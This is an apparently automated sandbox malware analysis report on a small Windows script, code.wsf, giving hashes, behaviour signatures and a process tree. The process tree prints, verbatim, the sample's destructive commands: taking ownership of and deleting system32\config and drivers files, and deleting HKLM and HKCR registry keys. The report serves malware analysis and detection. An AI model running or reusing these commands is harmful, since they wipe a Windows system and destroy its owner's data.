Analysis
-
max time kernel
46s -
max time network
48s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
15-08-2024 21:42
Static task
static1
Behavioral task
behavioral1
Sample
code.wsf
Resource
win7-20240729-en
General
-
Target
code.wsf
-
Size
3KB
-
MD5
57a8ed12915b612b81ec573f56394818
-
SHA1
f834294e6d6a7150da076670825857960df8a7a2
-
SHA256
0461ce4eb37d43545491e5d2a9c42b673669378cba5cfa141be1cc0280dfdedf
-
SHA512
2bdfeff4bd4ce78baeeddca3be307c1ca263034703e4bbccbe360b9cc32c43df0fa2279e893b4ebbf3a27832de6d575dff6297b4ae16dba628e7c7115897ca68
Malware Config
Signatures
-
Possible privilege escalation attempt 4 IoCs
Processes:
icacls.exeicacls.exetakeown.exetakeown.exepid process 4828 icacls.exe 4868 icacls.exe 4672 takeown.exe 2996 takeown.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation WScript.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
icacls.exetakeown.exetakeown.exeicacls.exepid process 4868 icacls.exe 4672 takeown.exe 2996 takeown.exe 4828 icacls.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings cmd.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs regedit.exe 1 IoCs
Processes:
regedit.exepid process 4116 regedit.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
regedit.exepid process 4116 regedit.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
takeown.exedescription pid process Token: SeTakeOwnershipPrivilege 2996 takeown.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
cmd.exeWScript.execmd.execmd.exedescription pid process target process PID 3888 wrote to memory of 3364 3888 cmd.exe WScript.exe PID 3888 wrote to memory of 3364 3888 cmd.exe WScript.exe PID 3364 wrote to memory of 2708 3364 WScript.exe cmd.exe PID 3364 wrote to memory of 2708 3364 WScript.exe cmd.exe PID 3364 wrote to memory of 2712 3364 WScript.exe cmd.exe PID 3364 wrote to memory of 2712 3364 WScript.exe cmd.exe PID 2708 wrote to memory of 4672 2708 cmd.exe takeown.exe PID 2708 wrote to memory of 4672 2708 cmd.exe takeown.exe PID 2712 wrote to memory of 2996 2712 cmd.exe takeown.exe PID 2712 wrote to memory of 2996 2712 cmd.exe takeown.exe PID 2708 wrote to memory of 4828 2708 cmd.exe icacls.exe PID 2708 wrote to memory of 4828 2708 cmd.exe icacls.exe PID 2712 wrote to memory of 4868 2712 cmd.exe icacls.exe PID 2712 wrote to memory of 4868 2712 cmd.exe icacls.exe PID 3364 wrote to memory of 1540 3364 WScript.exe reg.exe PID 3364 wrote to memory of 1540 3364 WScript.exe reg.exe PID 3364 wrote to memory of 2604 3364 WScript.exe reg.exe PID 3364 wrote to memory of 2604 3364 WScript.exe reg.exe PID 3364 wrote to memory of 3324 3364 WScript.exe reg.exe PID 3364 wrote to memory of 3324 3364 WScript.exe reg.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "copy C:\Users\Admin\AppData\Local\Temp\code.wsf C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3888 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3364 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\config\*4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4672
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\config\* /grant everyone:(f)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\drivers\*4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2996
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\drivers\* /grant everyone:(f)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4868
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" delete HKCR\*.dll /f3⤵PID:1540
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" delete HKCR\*.exe /f3⤵PID:2604
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" delete HKLM\* /f3⤵
- Modifies registry key
PID:3324
-
-
-
C:\Windows\regedit.exe"C:\Windows\regedit.exe"1⤵
- Runs regedit.exe
- Suspicious behavior: GetForegroundWindowSpam
PID:4116
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD557a8ed12915b612b81ec573f56394818
SHA1f834294e6d6a7150da076670825857960df8a7a2
SHA2560461ce4eb37d43545491e5d2a9c42b673669378cba5cfa141be1cc0280dfdedf
SHA5122bdfeff4bd4ce78baeeddca3be307c1ca263034703e4bbccbe360b9cc32c43df0fa2279e893b4ebbf3a27832de6d575dff6297b4ae16dba628e7c7115897ca68
-
Filesize
77B
MD51fafd3091b9297603ea9989bed793089
SHA103688ce88040e39d04ec4a182427cf0992c827d6
SHA25684a4fba54d165a54fdb5e5fff87530ebf488e5da855cadac11d54582858e67ac
SHA5128273cf8d90b26a8247e8ac0317c1266a5ae24ba82dffe5f8b7ca46cb5ab8746aaf1eea089a4a6c1a9c612bb7d6f69ea944ed55c113e4da01d4cf53ac8cd44571